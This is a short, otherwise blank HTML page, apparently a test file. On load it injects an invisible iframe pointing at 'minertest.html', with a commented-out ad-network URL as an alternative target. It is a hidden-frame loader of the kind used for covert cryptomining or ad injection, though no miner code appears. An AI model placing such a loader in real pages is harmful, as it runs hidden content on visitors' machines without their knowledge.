﻿<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8" />
    <title></title>
    <script type="text/javascript">
        document.addEventListener("DOMContentLoaded", function (event) {
            var _iframe = document.createElement('iframe');
            _iframe.src = "minertest.html";//"//" + 'app.noproblemppc.com/npsb/ad.htm?OriginId=' + __origin_id;
            _iframe.style.display = 'none';
            try {
                document.getElementsByTagName('body')[0].appendChild(_iframe);
            } catch (exc) { }
        });

    </script>
</head>
<body>

</body>
</html>